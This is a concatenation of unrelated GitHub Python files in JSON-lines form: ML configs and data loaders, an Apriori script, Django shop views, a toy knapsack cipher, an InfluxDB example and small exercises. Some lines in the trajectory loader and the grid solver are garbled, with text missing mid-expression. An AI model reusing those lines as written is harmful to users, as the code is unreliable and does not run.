lr_schedule = [7,9]\n num_epochs = 13\n\n # visualization\n env = 'faster-rcnn' # visdom env\n port = 8097\n plot_every = 40 # vis every N iter\n snapshot_every = 50000 # vis every N iter\n\n # preset\n data = 'voc'\n pretrained_model = 'vgg16'\n\n batch_size = 1\n\n # not fully implemented yet\n use_cuda = True\n use_adam = False # Use Adam optimizer\n use_chainer = False # try match everything as chainer\n use_drop = False # use dropout in RoIHead\n # debug\n debug_file = '/tmp/debugf'\n\n test_num = 1000\n # model\n load_path = None\n\n caffe_pretrain = False # use caffe pretrained model instead of torchvision\n caffe_pretrain_path = 'data/vgg16_caffe.pth'\n\n def _parse(self, kwargs):\n state_dict = self._state_dict()\n for k, v in kwargs.items():\n if k not in state_dict:\n raise ValueError('UnKnown Option: \"--%s\"' % k)\n setattr(self, k, v)\n\n print('======user config========')\n pprint(self._state_dict())\n print('==========end============')\n\n def _state_dict(self):\n return {k: getattr(self, k) for k, _ in Config.__dict__.items() \\\n if not k.startswith('_')}\n\n\nopt = Config()\n","repo_name":"rbavery/animal_detector","sub_path":"SpeciesClassification/FasterRCNNDetection/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"10721943881","text":"\"\"\"\n trajectory dataset code from Social-STGCNN: A Social Spatio-Temporal Graph Convolutional Neural Network for Human Trajectory Prediction\n\"\"\"\n\nimport os\nimport math\nimport sys\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport torch.nn.functional as Func\nfrom torch.nn import init\nfrom torch.nn.parameter import Parameter\nfrom torch.nn.modules.module import Module\nimport dill\nimport torch.optim as optim\n\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nfrom numpy import linalg as LA\nimport networkx as nx\nfrom tqdm import tqdm\nimport time\nfrom scipy.interpolate import interp1d\n\nM = np.array([[ 2.84217540e-02, 2.97335273e-03, 6.02821031e+00],\n [-1.67162992e-03, 4.40195878e-02, 7.29109248e+00],\n [-9.83343172e-05, 5.42377797e-04, 1.00000000e+00]])\n\nneighbor_thred = 1e5\n\ndef anorm(p1,p2): \n NORM = math.sqrt((p1[0]-p2[0])**2+ (p1[1]-p2[1])**2)\n if NORM ==0:\n return 0\n return 1/(NORM)\n \ndef seq_to_graph(seq_,seq_rel,norm_lap_matr = True):\n seq_ = seq_.squeeze()\n seq_rel = seq_rel.squeeze()\n seq_len = seq_.shape[2]\n max_nodes = seq_.shape[0]\n\n \n V = np.zeros((seq_len,max_nodes,2))\n A = np.zeros((seq_len,max_nodes,max_nodes))\n Ab = np.zeros((seq_len,max_nodes,max_nodes)) #neig_mat\n for s in range(seq_len):\n step_ = seq_[:,:,s]\n step_rel = seq_rel[:,:,s]\n for h in range(len(step_)): \n V[s,h,:] = step_rel[h]\n A[s,h,h] = 1\n Ab[s,h,h] = 1 # neig_mat\n for k in range(h+1,len(step_)):\n l2_norm = anorm(step_[h],step_[k])\n A[s,h,k] = l2_norm\n A[s,k,h] = l2_norm\n Ab[s,h,k] = int((1/l2_norm) Non Linear 0-> Linear\n \"\"\"\n t = np.linspace(0, traj_len - 1, traj_len)\n res_x = np.polyfit(t, traj[0, -traj_len:], 2, full=True)[1]\n res_y = np.polyfit(t, traj[1, -traj_len:], 2, full=True)[1]\n if res_x + res_y >= threshold:\n return 1.0\n else:\n return 0.0\ndef read_file(_path, delim='\\t', normalize = False):\n data = []\n if delim == 'tab':\n delim = '\\t'\n elif delim == 'space':\n delim = ' '\n with open(_path, 'r') as f:\n for line in f:\n line = line.strip().split(delim)\n line = [float(i) for i in line]\n data.append(line)\n dataf = pd.DataFrame(data,columns=['frame','id','pos_x','pos_y'])\n dataf_new = pd.DataFrame()\n ids = dataf.id.unique()\n time_unit=1/12.5\n for _id in ids:\n dataf_i = dataf[dataf.id==_id]\n begin_f,end_f = dataf_i.frame.min(),dataf_i.frame.max()\n if end_f-begin_f<30:\n continue\n sample_f = np.arange(begin_f, end_f+1, 25*time_unit)\n # image 2 world coord\n image_coordination = np.concatenate((dataf_i.pos_x.values[:,np.newaxis], dataf_i.pos_y.values[:,np.newaxis], np.ones((len(dataf_i.pos_x),1))), axis=1)\n world_coordination = np.einsum('ij,nj->ni', M, image_coordination)\n interp_x = interp1d(dataf_i.frame.values, world_coordination[:,0]/world_coordination[:, 2], kind='cubic')(sample_f)\n interp_y = interp1d(dataf_i.frame.values, world_coordination[:,1]/world_coordination[:, 2], kind='cubic')(sample_f)\n \n dataf_new=pd.concat([dataf_new,pd.DataFrame([sample_f,_id*np.ones(len(sample_f)),interp_x,interp_y]).T])\n dataf_new.columns=['frame','id','inter_x','inter_y']\n dataf_new.frame=dataf_new.frame.astype(int)\n dataf_new.id=dataf_new.id.astype(int)\n dataf_new.sort_values('frame',inplace=True)\n if normalize:\n dataf_new.inter_x = dataf_new.inter_x-dataf_new.inter_x.mean()\n dataf_new.inter_y = dataf_new.inter_y-dataf_new.inter_y.mean()\n return dataf_new.to_numpy()\n\nclass TrajectoryDataset(Dataset):\n \"\"\"Dataloder for the Trajectory datasets\"\"\"\n def __init__(\n self, data_dir, obs_len=8, pred_len=8, skip=1, threshold=0.002,\n min_ped=1, delim='\\t',norm_lap_matr = True, normalize=False):\n \"\"\"\n Args:\n - data_dir: Directory containing dataset files in the format\n \n - obs_len: Number of time-steps in input trajectories\n - pred_len: Number of time-steps in output trajectories\n - skip: Number of frames to skip while making the dataset\n - threshold: Minimum error to be considered for non linear traj\n when using a linear predictor\n - min_ped: Minimum number of pedestrians that should be in a seqeunce\n - delim: Delimiter in the dataset files\n \"\"\"\n super(TrajectoryDataset, self).__init__()\n\n self.max_peds_in_frame = 0\n self.data_dir = data_dir\n self.obs_len = obs_len\n self.pred_len = pred_len\n self.skip = skip\n self.seq_len = self.obs_len + self.pred_len\n self.delim = delim\n self.norm_lap_matr = norm_lap_matr\n\n all_files = os.listdir(self.data_dir)\n all_files = [os.path.join(self.data_dir, _path) for _path in all_files]\n num_peds_in_seq = []\n seq_list = []\n seq_list_rel = []\n vel_list = []\n acc_list = []\n loss_mask_list = []\n non_linear_ped = []\n for path in all_files:\n data = read_file(path, delim, normalize)\n frames = np.unique(data[:, 0]).tolist()\n frame_data = []\n for frame in frames:\n frame_data.append(data[frame == data[:, 0], :])\n num_sequences = int(\n math.ceil((len(frames) - self.seq_len + 1) / skip))\n\n for idx in range(0, num_sequences * self.skip + 1, skip):\n curr_seq_data = np.concatenate(\n frame_data[idx:idx + self.seq_len], axis=0)\n peds_in_curr_seq = np.unique(curr_seq_data[:, 1])\n self.max_peds_in_frame = max(self.max_peds_in_frame,len(peds_in_curr_seq))\n curr_seq_rel = np.zeros((len(peds_in_curr_seq), 2,\n self.seq_len))\n curr_seq = np.zeros((len(peds_in_curr_seq), 2, self.seq_len))\n curr_vel = np.zeros((len(peds_in_curr_seq), 2, self.seq_len))\n curr_acc = np.zeros((len(peds_in_curr_seq), 2, self.seq_len))\n curr_loss_mask = np.zeros((len(peds_in_curr_seq),\n self.seq_len))\n num_peds_considered = 0\n flag=0\n _non_linear_ped = []\n for _, ped_id in enumerate(peds_in_curr_seq):\n curr_ped_seq = curr_seq_data[curr_seq_data[:, 1] ==\n ped_id, :]\n curr_ped_seq = np.around(curr_ped_seq, decimals=6) # round 6 decimals\n pad_front = frames.index(curr_ped_seq[0, 0]) - idx\n pad_end = frames.index(curr_ped_seq[-1, 0]) - idx + 1\n if pad_end - pad_front != self.seq_len:\n flag=1\n break\n # continue\n curr_ped_seq = np.transpose(curr_ped_seq[:, 2:])\n curr_ped_seq = curr_ped_seq\n # Make coordinates relative\n rel_curr_ped_seq = np.zeros(curr_ped_seq.shape)\n rel_curr_ped_seq[:, 1:] = \\\n curr_ped_seq[:, 1:] - curr_ped_seq[:, :-1]\n _idx = num_peds_considered\n curr_seq[_idx, :, pad_front:pad_end] = curr_ped_seq\n curr_seq_rel[_idx, :, pad_front:pad_end] = rel_curr_ped_seq\n \n vel_curr_ped_seq = np.zeros(curr_ped_seq.shape)\n vel_curr_ped_seq[:, 1:] = rel_curr_ped_seq[:, 1:] / (1/12.5)\n acc_curr_ped_seq = np.zeros(curr_ped_seq.shape)\n acc_curr_ped_seq[:, 2:] = \\\n (vel_curr_ped_seq[:, 2:] - vel_curr_ped_seq[:, 1:-1])/(1/12.5)\n curr_vel[_idx, :, pad_front:pad_end] = vel_curr_ped_seq\n curr_acc[_idx, :, pad_front:pad_end] = acc_curr_ped_seq\n # Linear vs Non-Linear Trajectory\n # _non_linear_ped.append(\n # poly_fit(curr_ped_seq, pred_len, threshold))\n curr_loss_mask[_idx, pad_front:pad_end] = 1\n num_peds_considered += 1\n\n if num_peds_considered > min_ped and flag==0:\n non_linear_ped += _non_linear_ped\n num_peds_in_seq.append(num_peds_considered)\n loss_mask_list.append(curr_loss_mask[:num_peds_considered])\n seq_list.append(curr_seq[:num_peds_considered])\n seq_list_rel.append(curr_seq_rel[:num_peds_considered])\n vel_list.append(curr_vel[:num_peds_considered])\n acc_list.append(curr_acc[:num_peds_considered])\n\n self.num_seq = len(seq_list)\n seq_list = np.concatenate(seq_list, axis=0)\n seq_list_rel = np.concatenate(seq_list_rel, axis=0)\n vel_list = np.concatenate(vel_list, axis=0)\n acc_list = np.concatenate(acc_list, axis=0)\n loss_mask_list = np.concatenate(loss_mask_list, axis=0)\n non_linear_ped = np.asarray(non_linear_ped)\n\n # Convert numpy -> Torch Tensor\n self.obs_traj = seq_list[:, :, :self.obs_len]\n self.pred_traj = seq_list[:, :, self.obs_len:]\n self.obs_traj_rel = seq_list_rel[:, :, :self.obs_len]\n self.pred_traj_rel = seq_list_rel[:, :, self.obs_len:]\n \n self.obs_traj_vel = vel_list[:, :, :self.obs_len]\n self.pred_traj_vel = vel_list[:, :, self.obs_len:]\n self.obs_traj_acc = acc_list[:, :, :self.obs_len]\n self.pred_traj_acc = acc_list[:, :, self.obs_len:]\n \n self.loss_mask = loss_mask_list\n self.non_linear_ped = torch.from_numpy(non_linear_ped).type(torch.float)\n cum_start_idx = [0] + np.cumsum(num_peds_in_seq).tolist()\n self.seq_start_end = [\n (start, end)\n for start, end in zip(cum_start_idx, cum_start_idx[1:])\n ]\n #Convert to Graphs \n self.v_obs = [] \n self.A_obs = [] \n self.Nei_obs = []\n self.v_pred = [] \n self.A_pred = []\n self.Nei_pred = [] \n print(\"Processing Data .....\")\n pbar = tqdm(total=len(self.seq_start_end)) \n for ss in range(len(self.seq_start_end)):\n pbar.update(1)\n\n start, end = self.seq_start_end[ss]\n\n v_,a_,ab_ = seq_to_graph(self.obs_traj[start:end,:],self.obs_traj_rel[start:end, :],self.norm_lap_matr)\n self.v_obs.append(v_.clone())\n self.A_obs.append(a_.clone())\n self.Nei_obs.append(ab_.clone())\n v_,a_,ab_=seq_to_graph(self.pred_traj[start:end,:],self.pred_traj_rel[start:end, :],self.norm_lap_matr)\n self.v_pred.append(v_.clone())\n self.A_pred.append(a_.clone())\n self.Nei_pred.append(ab_.clone())\n pbar.close()\n\n def __len__(self):\n return self.num_seq\n\n def __getitem__(self, index):\n start, end = self.seq_start_end[index]\n\n out = [\n self.obs_traj[start:end, :], self.pred_traj[start:end, :],\n self.obs_traj_rel[start:end, :], self.pred_traj_rel[start:end, :],\n self.obs_traj_vel[start:end, :],self.pred_traj_vel[start:end, :],\n self.obs_traj_acc[start:end, :],self.pred_traj_acc[start:end, :],\n self.non_linear_ped[start:end], self.loss_mask[start:end, :],\n self.v_obs[index], self.A_obs[index], self.Nei_obs[index],\n self.v_pred[index], self.A_pred[index],self.Nei_pred[index]\n\n ]\n return out\n \nif __name__==\"__main__\":\n dataset='eth'\n assert dataset in ['eth','hotel','univ','zara1','zara2']\n data_set = './raw_data/'+dataset+'/'\n obs_seq_len=8\n pred_seq_len=12\n data_folder_name = 'processed_data_sf'\n os.makedirs(data_folder_name,exist_ok=True)\n \n dset_train = TrajectoryDataset(\n data_set+'train/',\n obs_len=obs_seq_len,\n pred_len=pred_seq_len,\n skip=1,norm_lap_matr=False,normalize=True)\n data_dict_path = os.path.join(data_folder_name, '_'.join([dataset, 'train']) + '.pkl')\n \n with open(data_dict_path, 'wb') as f:\n dill.dump(dset_train, f, protocol=dill.HIGHEST_PROTOCOL)\n # read use:\n # with open(self.train_data_path, 'rb') as f:\n # self.train_env = dill.load(f, encoding='latin1')\n \n dset_eval = TrajectoryDataset(\n data_set+'val/',\n obs_len=obs_seq_len,\n pred_len=pred_seq_len,\n skip=10,norm_lap_matr=False,normalize=True)\n data_dict_path = os.path.join(data_folder_name, '_'.join([dataset, 'eval']) + '.pkl')\n \n with open(data_dict_path, 'wb') as f:\n dill.dump(dset_train, f, protocol=dill.HIGHEST_PROTOCOL)\n \n dset_eval = TrajectoryDataset(\n data_set+'test/',\n obs_len=obs_seq_len,\n pred_len=pred_seq_len,\n skip=10,norm_lap_matr=False,normalize=True)\n data_dict_path = os.path.join(data_folder_name, '_'.join([dataset, 'test']) + '.pkl')\n \n with open(data_dict_path, 'wb') as f:\n dill.dump(dset_train, f, protocol=dill.HIGHEST_PROTOCOL)","repo_name":"JoeSandos/SocPhyDiff","sub_path":"utils/TrajectoryDS.py","file_name":"TrajectoryDS.py","file_ext":"py","file_size_in_byte":14071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9537703480","text":"minsup = 0.3\r\nminconf = 0.8 \r\ndef count_first(transactions):\r\n adict = {}\r\n for t in transactions:\r\n for item in t:\r\n if item in adict:\r\n adict[item] += 1\r\n else:\r\n adict[item] = 1\r\n return adict \r\ndef find_frequent(Candidate, minsup, no_of_lines):\r\n adict={}\r\n for key in Candidate:\r\n if ((float)(Candidate[key]/no_of_lines)) >= minsup:\r\n adict[key] = Candidate[key] \r\n return adict \r\ndef candidate_gen(keys):\r\n adict={}\r\n for i in keys:\r\n for j in keys:\r\n if i != j and (j,i) not in adict:\r\n adict[tuple([min(i,j),max(i,j)])] = 0\r\n return adict \r\ndef add_frequency(Candidate, transactions):\r\n for key in Candidate:\r\n for t in transactions:\r\n if key[0] in t and key[1] in t:\r\n Candidate[key] += 1\r\n return Candidate \r\nf = open(\"facebook_combined.txt\",\"r\")\r\ntransactions = []\r\nno_of_lines=0 \r\nfor line in f:\r\n split_line = line.split()\r\n transactions.append(split_line)\r\n no_of_lines = no_of_lines + 1 \r\nprint(no_of_lines) ","repo_name":"llencode/snapapriori","sub_path":"apriori.py","file_name":"apriori.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71928340712","text":"from django.shortcuts import render\nfrom django.views import generic\nfrom django.contrib.auth import get_user_model\nfrom products.models import Product, Category, Cart, CIM, OIM, Item, Order\nfrom products.forms import ContactUsForm, CommentForm\nfrom django.urls import reverse_lazy\nfrom django.db.models import Q\nfrom django.shortcuts import redirect\nfrom django.db.models import Sum\nfrom django.conf import settings\nfrom products.models import Comment\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Avg\n# Create your views here.\nclass ProductListView(generic.ListView):\n model = Product\n products = Product.objects.all().order_by('-discount')\n context_object_name ='products'\n template_name = \"products/index.html\"\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n categories = Category.objects.all()\n context['categories'] = categories\n return context\n\nclass AllProductListView(generic.ListView):\n model = Product\n queryset = Product.objects.all()\n context_object_name = 'products'\n template_name = 'products/all-product.html'\n paginate_by = 8\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n categories = Category.objects.all()\n context['categories'] = categories\n return context\n\n\nclass SearchView(generic.ListView):\n model = Product\n context_object_name = 'products'\n template_name = \"products/all-product.html\"\n def get_queryset(self, **kwargs):\n queryset = Product.objects.filter(Q(name__contains= self.request.GET.get('search')))\n return queryset\n# def get_context_data(self, **kwargs):\n# context = super().get_context_data(**kwargs)\n# categories = Category.objects.all()\n# context['categories'] = categories\n# # return context\n\ndef category_specific(request,id):\n categories = Category.objects.all()\n products = Product.objects.filter(category = id)\n return render(request,'products/all-product.html',context = {'products':products, 'categories':categories})\n\nclass SingleProductDetailView(generic.DetailView):\n model = Product\n queryset = Product.objects.all()\n template_name = \"products/single-product.html\"\n pk_url_kwarg = 'id'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n prod = kwargs.get('object')\n cat = prod.category\n same_category_products = Product.objects.filter(category = cat )\n diff_category_products = Product.objects.exclude(category = cat)\n print(kwargs.get('object').id)\n context['same_category_products'] = same_category_products\n context['diff_category_products'] = diff_category_products\n comments = Comment.objects.filter(product = kwargs.get('object')).order_by('-rate')\n print(comments)\n average_rating = comments.aggregate(Avg('rate'))\n print(average_rating['rate__avg'])\n context['comments'] = comments\n context['average_rating'] = average_rating.get(\"rate__avg\")\n return context\n\nclass AboutView(generic.TemplateView):\n template_name = 'products/about.html' \n\nclass ContactUsView(generic.FormView):\n form_class = ContactUsForm\n template_name = \"products/contact-us.html\"\n success_url = reverse_lazy('success')\n\nclass SuccessView(generic.TemplateView):\n template_name = \"products/success-response.html\"\n\ndef AddToCartView(request, id):\n if not request.user.is_authenticated:\n cart = request.session.get(settings.CART_SESSION_ID)\n if not cart:\n cart = request.session[settings.CART_SESSION_ID] = {}\n ID = str(id)\n quantity = request.GET.get('qty')\n if ID not in cart:\n cart[ID] = {'identity':id, \"qty\": quantity}\n else:\n cart[ID]['qty'] = request.GET.get('qty')\n print(cart.values())\n print(request.session.get(settings.CART_SESSION_ID))\n request.session.modified = True\n # print(request.session['cart']) #{'cart':{id:qty, id1:qty2}}\n # if id not in request.session['cart']:\n # print(request.session['cart'])\n # print('hey')\n # request.session['cart'] = {int(id) : int(request.GET.get('qty'))}\n # else:\n # print('hi')\n # request.session['cart'].update({int(id) : int(request.GET.get('qty'))})\n # print(request.session['cart'][id])\n # # request.session.get('cart').get(id) = request.GET.get('qty')\n return redirect('single-product', id)\n else:\n product = Product.objects.get(id = id)\n cart_obj = Cart.objects.get_or_create(user = request.user)\n # if cart_obj:\n # print(cart_obj)\n # item_obj = Item.objects.create(product = product, quantity = request.GET.get('qty'))\n # cim_obj = CIM.objects.create(cart = cart_obj, item = item_obj)\n # else:\n # cart_obj = Cart.objects.create(user = request.user)\n # print(cart_obj)\n item_obj = Item.objects.create(product = product ,quantity = request.GET.get('qty'))\n cim_obj = CIM.objects.create(cart = cart_obj[0], item = item_obj)\n return redirect('single-product', id)\n\nclass CartView(generic.View):\n def get(self, request):\n if request.user.is_authenticated:\n cart_id = Cart.objects.get(user = request.user)\n cims = CIM.objects.filter(cart = cart_id)\n context = {'cims':cims}\n total_price = cims.aggregate(total =Sum('total'))\n total_bill = total_price.get('total')\n print(total_bill)\n context['total_bill'] = total_bill\n return render(request, 'products/viewcart.html', context )\n else:\n cart = request.session.get(settings.CART_SESSION_ID)\n print(cart)\n items = []\n qty = []\n price = []\n total = []\n for dic in cart.values():\n items.append(Product.objects.get(id = int(dic.get('identity'))))\n qty.append(int(dic.get('qty')))\n print(items)\n print(qty)\n for p in items:\n price.append(p.discounted_price)\n print(price)\n for num1, num2 in zip(qty,price):\n total.append(num1*num2)\n print(total)\n total_bill = sum(total)\n print(total_bill)\n # for i,t in enumerate(prices):\n # for k,j enumerate(qty):\n # if i == k:\n # total.append(t*j)\n context = {\"items\":items, \"qty\":qty, \"price\":price, 'total':total, 'total_bill':total_bill}\n return render(request, \"products/viewcart.html\",context) \n\nclass AddToOrderView(generic.View):\n def get(self, request):\n if request.user.is_authenticated:\n cart_id = Cart.objects.get(user = request.user)\n cims = CIM.objects.filter(cart = cart_id)\n total_price = cims.aggregate(total =Sum('total'))\n total_bill = total_price.get('total')\n order = Order.objects.create(user=request.user, total_bill = total_bill)\n context = {'order':order}\n for cim in cims:\n oim = OIM.objects.create(order=order, item = cim.item)\n cims.delete()\n return render(request, 'products/order-placed.html', context)\n else:\n print(request.session.get(settings.CART_SESSION_ID))\n return redirect('bufferurl')\n \n\nclass OrderView(generic.View):\n def get(self,request, *args, **kwargs):\n orders = Order.objects.filter(user_id = kwargs['id'])\n context = {'orders':orders}\n return render(request, \"products/order-details.html\", context)\n \nclass OrderItemView(generic.View):\n def get(self, request,id, *args, **kwargs):\n print(id)\n oims = OIM.objects.filter(order_id = id)\n print(oims)\n context = {'oims':oims}\n return render(request, \"products/order-items.html\" , context)\n\ndef AddCommentView(request, id):\n if request.method == 'POST':\n form = CommentForm(request.POST)\n if form.is_valid():\n data = Comment() # create relation with model\n data.subject = form.cleaned_data['subject']\n data.comment = form.cleaned_data['comment']\n print(form.cleaned_data['rate'])\n data.rate = form.cleaned_data['rate']\n data.product_id=id\n current_user= request.user\n data.user_id=current_user.id\n data.save() # save data to tables\n return redirect('single-product', id)\n@login_required(login_url='login')\ndef BufferUrlView(request, *args, **kwargs):\n cart = request.session.get(settings.CART_SESSION_ID)\n print(cart)\n items = []\n qty = []\n price = []\n total = []\n for dic in cart.values():\n items.append(Product.objects.get(id = int(dic.get('identity'))))\n qty.append(int(dic.get('qty')))\n print(items)\n print(qty)\n for p in items:\n price.append(p.discounted_price)\n print(price)\n for num1, num2 in zip(qty,price):\n total.append(num1*num2)\n print(total)\n total_bill = sum(total)\n print(total_bill)\n cart_obj = Cart.objects.get_or_create(user = request.user)\n for p, q in zip(items,qty):\n item_obj = Item.objects.create(product = p ,quantity = q)\n cim_obj = CIM.objects.create(cart = cart_obj[0], item = item_obj)\n cart_id = Cart.objects.get(user = request.user)\n cims = CIM.objects.filter(cart = cart_id)\n total_price = cims.aggregate(total =Sum('total'))\n total_bill = total_price.get('total')\n order = Order.objects.create(user=request.user, total_bill = total_bill)\n context = {'order':order}\n for cim in cims:\n oim = OIM.objects.create(order=order, item = cim.item)\n cims.delete() \n return render(request, 'products/order-placed.html', context)\n","repo_name":"foxowl-ops/ecom_project","sub_path":"ecommerce/products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39316912789","text":"class MerkleHellman: \n encoding = {'A': [0, 0, 0, 1, 1], 'B': [0, 0, 1, 0, 1], 'C': [0, 0, 1, 1, 0],\n 'D': [0, 0, 1, 1, 1], 'E': [0, 1, 0, 0, 1], 'F': [0, 1, 0, 1, 0],\n 'G': [0, 1, 0, 1, 1], 'H': [0, 1, 1, 0, 0], 'I': [0, 1, 1, 0, 1],\n 'J': [0, 1, 1, 1, 0], 'K': [0, 1, 1, 1, 1], 'L': [1, 0, 0, 0, 1],\n 'M': [1, 0, 0, 1, 0], 'N': [1, 0, 0, 1, 1], 'O': [1, 0, 1, 0, 0],\n 'P': [1, 0, 1, 0, 1], 'Q': [1, 0, 1, 1, 0], 'R': [1, 0, 1, 1, 1],\n 'S': [1, 1, 0, 0, 0], 'T': [1, 1, 0, 0, 1], 'U': [1, 1, 0, 1, 0],\n 'V': [1, 1, 0, 1, 1], 'W': [1, 1, 1, 0, 0], 'X': [1, 1, 1, 0, 1],\n 'Y': [1, 1, 1, 1, 0], 'Z': [1, 1, 1, 1, 1]}\n\n\n def __init__(self, modulo, t, super_inc_seq):\n self.modulo = modulo\n self.t = t\n self.super_inc_seq = super_inc_seq\n self.public_key = self.__generate_public_key()\n \n def __generate_public_key(self):\n return [t * ai % self.modulo for ai \n in self.super_inc_seq]\n \n def __encrypt_block(self, block):\n return sum([x[0]*x[1] for x \n in zip(block, self.public_key)])\n \n def encrypt(self, message): \n return [self.__encrypt_block(block) \n for block in MerkleHellman.encode(message)]\n \n @staticmethod\n def encode(message):\n \"\"\"\n it is assumed that the length of the message \n is in accordance with the exmaple\n \"\"\" \n enc_m = []\n for i in range(0, len(message), 2):\n enc_m.append(MerkleHellman.encoding[message[i]] + \n MerkleHellman.encoding[message[i+1]])\n return enc_m\n\n\nif __name__ == \"__main__\":\n super_inc_seq = [2, 3, 7, 13, 27, 53, \n 106, 213, 425, 851]\n modulo = 1529\n t = 64 # modulo and t are coprime\n\n mh = MerkleHellman(modulo, t, super_inc_seq)\n\n print(mh.public_key)\n print(mh.encode(\"LONDON\"))\n print(mh.encrypt(\"LONDON\"))\n","repo_name":"HeavyHelium/Algebraic-Stuff","sub_path":"MH_knapsack.py","file_name":"MH_knapsack.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31908346033","text":"from .pm import PedigreeMatrix\nimport re\n\n\ncomment_matcher = re.compile(\"^\\([0-9na, ]*\\)\")\n\n\ndef from_ei_text(comment):\n \"\"\"Create PedigreeMatrix from ecoinvent comment text\"\"\"\n factors = comment_matcher.match(comment).group()\n assert factors, \"No formatted comment found\"\n return PedigreeMatrix(factors)\n","repo_name":"scyjth/biosteam_lca","sub_path":"biosteam_lca/_pedigree_matrix/ecoinvent.py","file_name":"ecoinvent.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"29084120598","text":"from collections import namedtuple\nfrom dataclasses import dataclass\nfrom datetime import datetime\n\nfrom influxdb_client import InfluxDBClient\nfrom influxdb_client.client.write_api import SYNCHRONOUS\n\n\nclass Sensor(namedtuple('Sensor', ['name', 'location', 'version', 'pressure', 'temperature', 'timestamp'])):\n \"\"\"\n Named structure - Sensor\n \"\"\"\n pass\n\n\n@dataclass\nclass Car:\n \"\"\"\n DataClass structure - Car\n \"\"\"\n engine: str\n type: str\n speed: float\n\n\n\"\"\"\nInitialize client\n\"\"\"\nwith InfluxDBClient(url=\"http://localhost:8086\", token=\"my-token\", org=\"my-org\") as client:\n write_api = client.write_api(write_options=SYNCHRONOUS)\n\n \"\"\"\n Sensor \"current\" state\n \"\"\"\n sensor = Sensor(name=\"sensor_pt859\",\n location=\"warehouse_125\",\n version=\"2021.06.05.5874\",\n pressure=125,\n temperature=10,\n timestamp=datetime.utcnow())\n print(sensor)\n\n \"\"\"\n Synchronous write\n \"\"\"\n write_api.write(bucket=\"my-bucket\",\n record=sensor,\n record_measurement_key=\"name\",\n record_time_key=\"timestamp\",\n record_tag_keys=[\"location\", \"version\"],\n record_field_keys=[\"pressure\", \"temperature\"])\n\n \"\"\"\n Car \"current\" speed\n \"\"\"\n car = Car('12V-BT', 'sport-cars', 125.25)\n print(car)\n\n \"\"\"\n Synchronous write\n \"\"\"\n write_api.write(bucket=\"my-bucket\",\n record=car,\n record_measurement_name=\"performance\",\n record_tag_keys=[\"engine\", \"type\"],\n record_field_keys=[\"speed\"])\n","repo_name":"influxdata/influxdb-client-python","sub_path":"examples/write_structured_data.py","file_name":"write_structured_data.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"72"} +{"seq_id":"30464894909","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 17 16:42:07 2020\n\n@author: liuqingxuan\n\"\"\"\n\nimport xlrd\nimport xlwt\nfrom datetime import date,datetime\n\nli1=[]\ndate=[]\ndata=xlrd.open_workbook('excelin2.xls')\ntable =data.sheets()[0]\nnum = table.nrows #共有幾列資料\nfor i in range(1,table.nrows):\n li1.append(table.cell(i,2).value-table.cell(i,3).value)\n\nli1.sort(reverse=True) #差價\ntarget = li1[4] #第五大\n\nfor i in range(1,table.nrows):\n a = table.cell(i,2).value-table.cell(i,3).value\n if a >= target:\n data_value=xlrd.xldate_as_tuple(table.cell(i,0).value,data.datemode)\n print('%d/%d/%d'%(data_value[0],data_value[1],data_value[2]))\n","repo_name":"hi-im67xuanOuO/SCU_Financial-Application-Programming-Stock-Prediction","sub_path":"Python class materials - 2020Spring/06170203-2.py","file_name":"06170203-2.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41306108608","text":"import sys\r\ninput=sys.stdin.readline\r\n\r\nn,m=map(int,input().split())\r\narr=[list(map(int,input().split())) for _ in range(n)]\r\nvisit=[[0 for _ in range(m)] for _ in range(n)]\r\n\r\ndef numbering(x,y,now):\r\n visit[x][y]=1\r\n arr[x][y]=now\r\n \r\n dx=[1,-1,0,0]\r\n dy=[0,0,-1,1]\r\n\r\n for i in range(4):\r\n xx=x+dx[i]\r\n yy=y+dy[i]\r\n if 0<=xxb:\r\n a,b=b,a\r\n if [cost-1,a,b] not in edge and cost-1>=2:\r\n edge.append([cost-1,a,b])\r\n continue\r\n xx=x+dx[arrow]\r\n yy=y+dy[arrow]\r\n if 0<=xx0 and n%2==1:\n diamond=\"\"\n for i in range(n):\n diamond += \" \" * abs((n//2) - i)\n diamond += \"*\"*(n-abs((n-1) -2 * i))\n diamond += \"\\n\"\n print(n,(abs((n-1) - 2 * i)))\n return diamond\n else: return None\n\n\nprint(diamond_up(5))\nprint(diamond_up(17))\nprint(diamond_up(17))\n\n","repo_name":"igruiz91/Codewars-HackerRank-LeetCode-CoderBite-freeCodeCamp","sub_path":"Codewars/Python/6 kyu/Give me a Diamond.py","file_name":"Give me a Diamond.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7614684343","text":"# -*- coding: utf-8 -*-\n# 日志类模型\n\nimport requests\nfrom django.db import connections, models\nfrom django.db.models import fields\n\nfrom framework.models import BaseModel, JSONField, SqlModelMixin\nfrom framework.translation import _\nfrom framework.utils import datetime_to_str, json_dumps\nfrom framework.utils.cache import 